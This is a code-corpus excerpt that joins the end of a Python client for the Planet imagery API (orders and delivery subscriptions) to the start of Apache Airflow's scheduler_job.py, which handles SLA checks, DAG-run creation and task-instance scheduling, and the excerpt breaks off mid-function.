            params['bbox'] = ','.join([str(b) for b in bbox])
        if time_range:
            params['time'] = time_range
        if before:
            params['before'] = before
        if after:
            params['after'] = after
        url = self._url('analytics/collections/{}/items'.format(
            subscription_id))
        return self._get(url, models.WFS3Features, params=params).get_body()
    def get_associated_resource_for_analytic_feature(self,
                                                     subscription_id,
                                                     feature_id,
                                                     resource_type):
        '''
        Get resource associated with some feature in an analytic subscription.
        Response might be JSON or a TIF, depending on requested resource.
        :param subscription_id str: ID of subscription
        :param feature_id str: ID of feature
        :param resource_type str: Type of resource to request.
        :raises planet.api.exceptions.APIException: On API error or resource
        type unavailable.
        :returns: :py:Class:`planet.api.models.JSON` for resource type
        `source-image-info`, but can also return
        :py:Class:`planet.api.models.Response` containing a
        :py:Class:`planet.api.models.Body` of the resource.
        '''
        url = self._url(
            'analytics/collections/{}/items/{}/resources/{}'.format(
                subscription_id, feature_id, resource_type))
        response = self._get(url).get_body()
        return response
    def get_orders(self):
        '''Get information for all pending and completed order requests for
        the current user.
        :returns: :py:Class:`planet.api.models.Orders`
        '''
        # TODO filter 'completed orders', 'in progress orders', 'all orders'?
        url = self._url('compute/ops/orders/v2')
        orders = (self._get(url, models.Orders).get_body())
        return orders
    def get_individual_order(self, order_id):
        '''Get order request details by Order ID.
        :param order_id str: The ID of the Order
        :returns: :py:Class:`planet.api.models.Order`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        url = self._url('compute/ops/orders/v2/{}'.format(order_id))
        return self._get(url, models.Order).get_body()
    def cancel_order(self, order_id):
        '''Cancel a running order by Order ID.
        :param order_id str: The ID of the Order to cancel
        :returns: :py:Class:`planet.api.models.Order`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        url = self._url('compute/ops/orders/v2/{}'.format(order_id))
        return self.dispatcher.response(models.Request(url, self.auth,
                                                       body_type=models.Order,
                                                       method='PUT')
                                        ).get_body()
    def create_order(self, request):
        '''Create an order.
        :param request: order request body (JSON-like dict)
        :returns: :py:Class:`planet.api.models.Order`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        url = self._url('compute/ops/orders/v2')
        body = json.dumps(request)
        return self.dispatcher.response(models.Request(url, self.auth,
                                                       body_type=models.Order,
                                                       data=body,
                                                       method='POST')
                                        ).get_body()
    def download_order(self, order_id, callback=None):
        '''Download all items in an order.
        :param order_id: ID of order to download
        :param callback: An optional function to asynchronously handle each
        download. See :py:func:`planet.api.write_to_file`
        :returns: list of :py:Class:`planet.api.models.Response`, one per
        item location in the order.
        :raises planet.api.exceptions.APIException: On API error.
        '''
        url = self._url('compute/ops/orders/v2/{}'.format(order_id))
        order = self._get(url, models.Order).get_body()
        locations = order.get_locations()
        return [self.download_location(location, callback=callback)
                for location in locations]
    def download_location(self, location, callback=None):
        '''Download an item in an order.
        :param location: location URL of item
        :param callback: An optional function to asynchronously handle the
        download. See :py:func:`planet.api.write_to_file`
        :returns: :py:Class:`planet.api.models.Response` containing a
        :py:Class:`planet.api.models.Body` of the asset.
        :raises planet.api.exceptions.APIException: On API error.
        '''
        return self._get(location, models.JSON, callback=callback)
    def get_delivery_subscriptions(self):
        '''Get information for all subscriptions for the current user, including
        cancelled subscriptions
        :returns: :py:Class:`planet.api.models.DeliverySubscriptions`
        '''
        return self._get(
            self._url('subscriptions/v1/'),
            models.DeliverySubscriptions
        ).get_body()
    def get_individual_delivery_subscription(self, subscription_id):
        '''Get subscription details by ID
        :param subscription_id str: The ID of the Subscription
        :returns: :py:class:`planet.api.models.JSON`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        return self._get(
            self._url('subscriptions/v1/{}'.format(subscription_id)),
            body_type=models.JSON
        ).get_body()
    def cancel_delivery_subscription(self, subscription_id):
        '''Cancel a running subscription by subscription ID
        Subscriptions can only be cancelled in Pending or Running State.
        :param subscription_id str: The ID of the Subscription
        :returns: :py:Class:`planet.api.models.Body`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        return self.dispatcher.response(
            models.Request(
                self._url('subscriptions/v1/{}/cancel'.format(subscription_id)),
                self.auth,
                body_type=models.Body,
                method='POST'
            )
        ).get_body()
    def create_delivery_subscription(self, request):
        '''Create a subscription.
        :param request: subscription request
        :returns: :py:class:`planet.api.models.JSON`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        return self.dispatcher.response(
            models.Request(
                self._url('subscriptions/v1/'),
                self.auth,
                body_type=models.JSON,
                data=json.dumps(request),
                method='POST'
            )
        ).get_body()
    def get_delivery_subscription_results(self, subscription_id, status=None, created=None, updated=None,
                                          completed=None):
        '''Get results for a given subscription
        :param subscription_id str: Subscription ID
        :param status str: Enum: "created" "queued" "processing" "failed" "success"
        :param created str: Only return results that were created in the given interval or instant.
        :param updated str: Only return results that were updated in the given interval or instant.
        :param completed str: Only return results that were completed in the given interval or instant.
        :returns :py:class:`planet.api.models.JSON`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        params = {}
        if status:
            params['status'] = status
        if created:
            params['created'] = created
        if updated:
            params['updated'] = updated
        if completed:
            params['completed'] = completed
        return self._get(
            self._url('subscriptions/v1/{}/results'.format(subscription_id)),
            body_type=models.JSON,
            params=params,
        ).get_body()
| 40.809524 | 105 | 0.607825 |
1f8940a43a3fb6f69f1e349133c8b608d0e14bfd | 66,603 | py | Python | airflow/jobs/scheduler_job.py | ganeshsrirams/airflow | b8c02632136320b8379956411134246cd2f6eb47 | [
"Apache-2.0"
] | null | null | null | airflow/jobs/scheduler_job.py | ganeshsrirams/airflow | b8c02632136320b8379956411134246cd2f6eb47 | [
"Apache-2.0"
] | null | null | null | airflow/jobs/scheduler_job.py | ganeshsrirams/airflow | b8c02632136320b8379956411134246cd2f6eb47 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import executors, models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagRun, SlaMiss, errors
from airflow.stats import Stats
from airflow.ti_deps.dep_context import SCHEDULEABLE_STATES, SCHEDULED_DEPS, DepContext
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessor, DagFileProcessorAgent, SimpleDag, SimpleDagBag, SimpleTaskInstance,
list_py_file_paths,
)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin):
    """Helps call SchedulerJob.process_file() in a separate process.

    :param file_path: a Python file containing Airflow DAG definitions
    :type file_path: unicode
    :param pickle_dags: whether to serialize the DAG objects to the DB
    :type pickle_dags: bool
    :param dag_id_white_list: If specified, only look at these DAG ID's
    :type dag_id_white_list: list[unicode]
    :param zombies: zombie task instances to kill
    :type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
    """

    # Counter that increments every time an instance of this class is created
    class_creation_counter = 0

    def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
        self._file_path = file_path

        # The process that was launched to process the given file.
        self._process = None
        self._dag_id_white_list = dag_id_white_list
        self._pickle_dags = pickle_dags
        self._zombies = zombies
        # The result of Scheduler.process_file(file_path).
        self._result = None
        # Whether the process is done running.
        self._done = False
        # When the process started.
        self._start_time = None
        # This ID is use to uniquely name the process / thread that's launched
        # by this processor instance
        self._instance_id = DagFileProcessor.class_creation_counter
        DagFileProcessor.class_creation_counter += 1

    @property
    def file_path(self):
        return self._file_path

    @staticmethod
    def _run_file_processor(result_channel,
                            file_path,
                            pickle_dags,
                            dag_id_white_list,
                            thread_name,
                            zombies):
        """
        Process the given file.

        :param result_channel: the connection to use for passing back the result
        :type result_channel: multiprocessing.Connection
        :param file_path: the file to process
        :type file_path: unicode
        :param pickle_dags: whether to pickle the DAGs found in the file and
            save them to the DB
        :type pickle_dags: bool
        :param dag_id_white_list: if specified, only examine DAG ID's that are
            in this list
        :type dag_id_white_list: list[unicode]
        :param thread_name: the name to use for the process that is launched
        :type thread_name: unicode
        :return: the process that was launched
        :rtype: multiprocessing.Process
        :param zombies: zombie task instances to kill
        :type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
        """
        # This helper runs in the newly created process
        log = logging.getLogger("airflow.processor")

        stdout = StreamLogWriter(log, logging.INFO)
        stderr = StreamLogWriter(log, logging.WARN)

        set_context(log, file_path)
        setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))

        try:
            # redirect stdout/stderr to log
            sys.stdout = stdout
            sys.stderr = stderr

            # Re-configure the ORM engine as there are issues with multiple processes
            settings.configure_orm()

            # Change the thread name to differentiate log lines. This is
            # really a separate process, but changing the name of the
            # process doesn't work, so changing the thread name instead.
            threading.current_thread().name = thread_name
            start_time = time.time()

            log.info("Started process (PID=%s) to work on %s",
                     os.getpid(), file_path)
            scheduler_job = SchedulerJob(dag_ids=dag_id_white_list, log=log)
            result = scheduler_job.process_file(file_path,
                                                zombies,
                                                pickle_dags)
            result_channel.send(result)
            end_time = time.time()
            log.info(
                "Processing %s took %.3f seconds", file_path, end_time - start_time
            )
        except Exception:
            # Log exceptions through the logging framework.
            log.exception("Got an exception! Propagating...")
            raise
        finally:
            result_channel.close()
            sys.stdout = sys.__stdout__
            sys.stderr = sys.__stderr__
            # We re-initialized the ORM within this Process above so we need to
            # tear it down manually here
            settings.dispose_orm()

    def start(self):
        """
        Launch the process and start processing the DAG.
        """
        self._parent_channel, _child_channel = multiprocessing.Pipe()
        self._process = multiprocessing.Process(
            target=type(self)._run_file_processor,
            args=(
                _child_channel,
                self.file_path,
                self._pickle_dags,
                self._dag_id_white_list,
                "DagFileProcessor{}".format(self._instance_id),
                self._zombies
            ),
            name="DagFileProcessor{}-Process".format(self._instance_id)
        )
        self._start_time = timezone.utcnow()
        self._process.start()

    def kill(self):
        """
        Kill the process launched to process the file, and ensure consistent state.
        """
        if self._process is None:
            raise AirflowException("Tried to kill before starting!")
        self._kill_process()
        # Close our end of the pipe so its file descriptor is not leaked; the
        # child end dies with the killed process. (Previously this method set
        # a nonexistent ``_result_queue`` attribute left over from a queue-based
        # implementation, which leaked the open pipe.)
        self._parent_channel.close()

    def terminate(self, sigkill=False):
        """
        Terminate (and then kill) the process launched to process the file.

        :param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
        :type sigkill: bool
        """
        if self._process is None:
            raise AirflowException("Tried to call terminate before starting!")

        self._process.terminate()
        # Arbitrarily wait 5s for the process to die
        self._process.join(5)
        if sigkill:
            self._kill_process()
        self._parent_channel.close()

    def _kill_process(self):
        # SIGKILL cannot be trapped, so this is the escalation of last resort.
        if self._process.is_alive():
            self.log.warning("Killing PID %s", self._process.pid)
            os.kill(self._process.pid, signal.SIGKILL)

    @property
    def pid(self):
        """
        :return: the PID of the process launched to process the given file
        :rtype: int
        """
        if self._process is None:
            raise AirflowException("Tried to get PID before starting!")
        return self._process.pid

    @property
    def exit_code(self):
        """
        After the process is finished, this can be called to get the return code

        :return: the exit code of the process
        :rtype: int
        """
        if not self._done:
            raise AirflowException("Tried to call retcode before process was finished!")
        return self._process.exitcode

    @property
    def done(self):
        """
        Check if the process launched to process this file is done.

        :return: whether the process is finished running
        :rtype: bool
        """
        if self._process is None:
            raise AirflowException("Tried to see if it's done before starting!")

        if self._done:
            return True

        if self._parent_channel.poll():
            try:
                self._result = self._parent_channel.recv()
                self._done = True
                self.log.debug("Waiting for %s", self._process)
                self._process.join()
                self._parent_channel.close()
                return True
            except EOFError:
                # The child closed its end without sending a result; fall
                # through to the liveness check below.
                pass

        if not self._process.is_alive():
            self._done = True
            self.log.debug("Waiting for %s", self._process)
            self._process.join()
            self._parent_channel.close()
            return True

        return False

    @property
    def result(self):
        """
        :return: result of running SchedulerJob.process_file()
        :rtype: airflow.utils.dag_processing.SimpleDag
        """
        if not self.done:
            raise AirflowException("Tried to get the result before it's done!")
        return self._result

    @property
    def start_time(self):
        """
        :return: when this started to process the file
        :rtype: datetime
        """
        if self._start_time is None:
            raise AirflowException("Tried to get start time before it started!")
        return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
    @provide_session
    def manage_slas(self, dag, session=None):
        """
        Finding all tasks that have SLAs defined, and sending alert emails
        where needed. New SLA misses are also recorded in the database.

        We are assuming that the scheduler runs often, so we only check for
        tasks that should have succeeded in the past hour.

        :param dag: the DAG whose tasks are checked for SLA misses
        :param session: ORM session (injected by ``@provide_session``)
        """
        # Fast exit: only tasks with a timedelta ``sla`` can miss an SLA.
        if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
            self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
            return

        TI = models.TaskInstance
        # Subquery: latest SUCCESS/SKIPPED execution_date per task of this DAG.
        sq = (
            session
            .query(
                TI.task_id,
                func.max(TI.execution_date).label('max_ti'))
            .with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
            .filter(TI.dag_id == dag.dag_id)
            .filter(or_(
                TI.state == State.SUCCESS,
                TI.state == State.SKIPPED))
            .filter(TI.task_id.in_(dag.task_ids))
            .group_by(TI.task_id).subquery('sq')
        )

        max_tis = session.query(TI).filter(
            TI.dag_id == dag.dag_id,
            TI.task_id == sq.c.task_id,
            TI.execution_date == sq.c.max_ti,
        ).all()

        ts = timezone.utcnow()
        for ti in max_tis:
            task = dag.get_task(ti.task_id)
            dttm = ti.execution_date
            if isinstance(task.sla, timedelta):
                # Walk the schedule forward from the last completed run;
                # every period whose deadline (period end + sla) has already
                # passed is recorded as a miss.
                dttm = dag.following_schedule(dttm)
                while dttm < timezone.utcnow():
                    following_schedule = dag.following_schedule(dttm)
                    if following_schedule + task.sla < timezone.utcnow():
                        # merge() makes the insert idempotent across scheduler loops.
                        session.merge(SlaMiss(
                            task_id=ti.task_id,
                            dag_id=ti.dag_id,
                            execution_date=dttm,
                            timestamp=ts))
                    dttm = dag.following_schedule(dttm)
        session.commit()

        # Misses recorded for this DAG that have not been notified about yet.
        slas = (
            session
            .query(SlaMiss)
            .filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id)  # noqa pylint: disable=singleton-comparison
            .all()
        )

        if slas:
            sla_dates = [sla.execution_date for sla in slas]
            # Non-successful TIs for the missed dates: candidates for the
            # "blocking tasks" list in the notification.
            qry = (
                session
                .query(TI)
                .filter(
                    TI.state != State.SUCCESS,
                    TI.execution_date.in_(sla_dates),
                    TI.dag_id == dag.dag_id
                ).all()
            )
            blocking_tis = []
            for ti in qry:
                if ti.task_id in dag.task_ids:
                    ti.task = dag.get_task(ti.task_id)
                    blocking_tis.append(ti)
                else:
                    # Task no longer exists in the DAG: drop the orphan TI row.
                    session.delete(ti)
                    session.commit()

            task_list = "\n".join([
                sla.task_id + ' on ' + sla.execution_date.isoformat()
                for sla in slas])
            blocking_task_list = "\n".join([
                ti.task_id + ' on ' + ti.execution_date.isoformat()
                for ti in blocking_tis])
            # Track whether email or any alert notification sent
            # We consider email or the alert callback as notifications
            email_sent = False
            notification_sent = False
            if dag.sla_miss_callback:
                # Execute the alert callback
                self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
                try:
                    dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
                                          blocking_tis)
                    notification_sent = True
                except Exception:
                    # A failing user callback must not break the scheduler loop.
                    self.log.exception("Could not call sla_miss_callback for DAG %s",
                                       dag.dag_id)
            email_content = """\
            Here's a list of tasks that missed their SLAs:
            <pre><code>{task_list}\n<code></pre>
            Blocking tasks:
            <pre><code>{blocking_task_list}\n{bug}<code></pre>
            """.format(task_list=task_list, blocking_task_list=blocking_task_list,
                       bug=asciiart.bug)
            # Union of the alert addresses of every task in the DAG.
            emails = set()
            for task in dag.tasks:
                if task.email:
                    if isinstance(task.email, str):
                        emails |= set(get_email_address_list(task.email))
                    elif isinstance(task.email, (list, tuple)):
                        emails |= set(task.email)
            if emails:
                try:
                    send_email(
                        emails,
                        "[airflow] SLA miss on DAG=" + dag.dag_id,
                        email_content)
                    email_sent = True
                    notification_sent = True
                except Exception:
                    self.log.exception("Could not send SLA Miss email notification for"
                                       " DAG %s", dag.dag_id)
            # If we sent any notification, update the sla_miss table
            if notification_sent:
                for sla in slas:
                    if email_sent:
                        sla.email_sent = True
                    sla.notification_sent = True
                    session.merge(sla)
            session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
    @provide_session
    def create_dag_run(self, dag, session=None):
        """
        This method checks whether a new DagRun needs to be created
        for a DAG based on scheduling interval.
        Returns DagRun if one is scheduled. Otherwise returns None.

        :param dag: DAG to possibly create a run for
        :param session: ORM session (injected by ``@provide_session``)
        """
        if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
            # Only scheduler-created (non externally triggered) runs count
            # against max_active_runs here.
            active_runs = DagRun.find(
                dag_id=dag.dag_id,
                state=State.RUNNING,
                external_trigger=False,
                session=session
            )
            # return if already reached maximum active runs and no timeout setting
            if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
                return
            # Fail any active run that has exceeded dagrun_timeout, which may
            # free a slot below.
            timedout_runs = 0
            for dr in active_runs:
                if (
                        dr.start_date and dag.dagrun_timeout and
                        dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
                    dr.state = State.FAILED
                    dr.end_date = timezone.utcnow()
                    dag.handle_callback(dr, success=False, reason='dagrun_timeout',
                                        session=session)
                    timedout_runs += 1
            session.commit()
            if len(active_runs) - timedout_runs >= dag.max_active_runs:
                return

            # this query should be replaced by find dagrun
            # Latest scheduler-created run (external triggers excluded via the
            # run_id prefix match).
            qry = (
                session.query(func.max(DagRun.execution_date))
                .filter_by(dag_id=dag.dag_id)
                .filter(or_(
                    DagRun.external_trigger == False,  # noqa: E712 pylint: disable=singleton-comparison
                    # add % as a wildcard for the like query
                    DagRun.run_id.like(DagRun.ID_PREFIX + '%')
                ))
            )
            last_scheduled_run = qry.scalar()

            # don't schedule @once again
            if dag.schedule_interval == '@once' and last_scheduled_run:
                return None

            # don't do scheduler catchup for dag's that don't have dag.catchup = True
            if not (dag.catchup or dag.schedule_interval == '@once'):
                # The logic is that we move start_date up until
                # one period before, so that timezone.utcnow() is AFTER
                # the period end, and the job can be created...
                now = timezone.utcnow()
                next_start = dag.following_schedule(now)
                last_start = dag.previous_schedule(now)
                if next_start <= now:
                    new_start = last_start
                else:
                    new_start = dag.previous_schedule(last_start)

                # Only move start_date forward, never backwards.
                if dag.start_date:
                    if new_start >= dag.start_date:
                        dag.start_date = new_start
                else:
                    dag.start_date = new_start

            next_run_date = None
            if not last_scheduled_run:
                # First run
                task_start_dates = [t.start_date for t in dag.tasks]
                if task_start_dates:
                    next_run_date = dag.normalize_schedule(min(task_start_dates))
                    self.log.debug(
                        "Next run date based on tasks %s",
                        next_run_date
                    )
            else:
                next_run_date = dag.following_schedule(last_scheduled_run)

            # make sure backfills are also considered
            last_run = dag.get_last_dagrun(session=session)
            if last_run and next_run_date:
                while next_run_date <= last_run.execution_date:
                    next_run_date = dag.following_schedule(next_run_date)

            # don't ever schedule prior to the dag's start_date
            if dag.start_date:
                next_run_date = (dag.start_date if not next_run_date
                                 else max(next_run_date, dag.start_date))
                if next_run_date == dag.start_date:
                    next_run_date = dag.normalize_schedule(dag.start_date)

                self.log.debug(
                    "Dag start date: %s. Next run date: %s",
                    dag.start_date, next_run_date
                )

            # don't ever schedule in the future or if next_run_date is None
            if not next_run_date or next_run_date > timezone.utcnow():
                return

            # this structure is necessary to avoid a TypeError from concatenating
            # NoneType
            if dag.schedule_interval == '@once':
                period_end = next_run_date
            elif next_run_date:
                period_end = dag.following_schedule(next_run_date)

            # Don't schedule a dag beyond its end_date (as specified by the dag param)
            if next_run_date and dag.end_date and next_run_date > dag.end_date:
                return

            # Don't schedule a dag beyond its end_date (as specified by the task params)
            # Get the min task end date, which may come from the dag.default_args
            min_task_end_date = []
            task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
            if task_end_dates:
                min_task_end_date = min(task_end_dates)
            if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
                return

            # Only create the run once its whole schedule period has elapsed.
            if next_run_date and period_end and period_end <= timezone.utcnow():
                next_run = dag.create_dagrun(
                    run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
                    execution_date=next_run_date,
                    start_date=timezone.utcnow(),
                    state=State.RUNNING,
                    external_trigger=False
                )
                return next_run
    @provide_session
    def _process_task_instances(self, dag, task_instances_list, session=None):
        """
        This method schedules the tasks for a single DAG by looking at the
        active DAG runs and adding task instances that should run to the
        queue.

        :param dag: the DAG whose runs are examined
        :param task_instances_list: output parameter; keys of schedulable TIs
            are appended to this list
        :param session: ORM session (injected by ``@provide_session``)
        """
        # update the state of the previously active dag runs
        dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
        active_dag_runs = []
        for run in dag_runs:
            self.log.info("Examining DAG run %s", run)
            # don't consider runs that are executed in the future
            if run.execution_date > timezone.utcnow():
                self.log.error(
                    "Execution date is in future: %s",
                    run.execution_date
                )
                continue

            if len(active_dag_runs) >= dag.max_active_runs:
                self.log.info("Number of active dag runs reached max_active_run.")
                break

            # skip backfill dagruns for now as long as they are not really scheduled
            if run.is_backfill:
                continue

            # todo: run.dag is transient but needs to be set
            run.dag = dag
            # todo: preferably the integrity check happens at dag collection time
            run.verify_integrity(session=session)
            run.update_state(session=session)
            if run.state == State.RUNNING:
                # Detach from the session so later commits don't expire it.
                make_transient(run)
                active_dag_runs.append(run)

        for run in active_dag_runs:
            self.log.debug("Examining active DAG run: %s", run)
            tis = run.get_task_instances(state=SCHEDULEABLE_STATES)

            # this loop is quite slow as it uses are_dependencies_met for
            # every task (in ti.is_runnable). This is also called in
            # update_state above which has already checked these tasks
            for ti in tis:
                task = dag.get_task(ti.task_id)

                # fixme: ti.task is transient but needs to be set
                ti.task = task

                if ti.are_dependencies_met(
                        dep_context=DepContext(flag_upstream_failed=True),
                        session=session):
                    self.log.debug('Queuing task: %s', ti)
                    task_instances_list.append(ti.key)
    @provide_session
    def _change_state_for_tis_without_dagrun(self,
                                             simple_dag_bag,
                                             old_states,
                                             new_state,
                                             session=None):
        """
        For all DAG IDs in the SimpleDagBag, look for task instances in the
        old_states and set them to new_state if the corresponding DagRun
        does not exist or exists but is not in the running state. This
        normally should not happen, but it can if the state of DagRuns are
        changed manually.

        :param old_states: examine TaskInstances in this state
        :type old_state: list[airflow.utils.state.State]
        :param new_state: set TaskInstances to this state
        :type new_state: airflow.utils.state.State
        :param simple_dag_bag: TaskInstances associated with DAGs in the
            simple_dag_bag and with states in the old_state will be examined
        :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
        """
        tis_changed = 0
        # TIs whose DagRun is missing (outer join yields NULL state) or not RUNNING.
        query = session \
            .query(models.TaskInstance) \
            .outerjoin(models.DagRun, and_(
                models.TaskInstance.dag_id == models.DagRun.dag_id,
                models.TaskInstance.execution_date == models.DagRun.execution_date)) \
            .filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
            .filter(models.TaskInstance.state.in_(old_states)) \
            .filter(or_(
                models.DagRun.state != State.RUNNING,
                models.DagRun.state.is_(None)))
        # SQLite can't do the subquery UPDATE below, so fall back to
        # row-by-row updates under a SELECT ... FOR UPDATE lock.
        if self.using_sqlite:
            tis_to_change = query \
                .with_for_update() \
                .all()
            for ti in tis_to_change:
                ti.set_state(new_state, session=session)
                tis_changed += 1
        else:
            # Single bulk UPDATE driven by the subquery; no session sync needed
            # since we don't reuse the affected objects afterwards.
            subq = query.subquery()
            tis_changed = session \
                .query(models.TaskInstance) \
                .filter(and_(
                    models.TaskInstance.dag_id == subq.c.dag_id,
                    models.TaskInstance.task_id == subq.c.task_id,
                    models.TaskInstance.execution_date ==
                    subq.c.execution_date)) \
                .update({models.TaskInstance.state: new_state},
                        synchronize_session=False)
            session.commit()

        if tis_changed > 0:
            self.log.warning(
                "Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
                tis_changed, new_state
            )
            Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
    @provide_session
    def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
        """
        Finds TIs that are ready for execution with respect to pool limits,
        dag concurrency, executor state, and priority.

        :param simple_dag_bag: TaskInstances associated with DAGs in the
            simple_dag_bag will be fetched from the DB and executed
        :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
        :param executor: the executor that runs task instances
        :type executor: BaseExecutor
        :param states: Execute TaskInstances in these states
        :type states: tuple[airflow.utils.state.State]
        :return: list[airflow.models.TaskInstance]
        """
        from airflow.jobs.backfill_job import BackfillJob  # Avoid circular import
        executable_tis = []

        # Get all task instances associated with scheduled
        # DagRuns which are not backfilled, in the given states,
        # and the dag is not paused
        TI = models.TaskInstance
        DR = models.DagRun
        DM = models.DagModel
        ti_query = (
            session
            .query(TI)
            .filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
            .outerjoin(
                DR,
                and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
            )
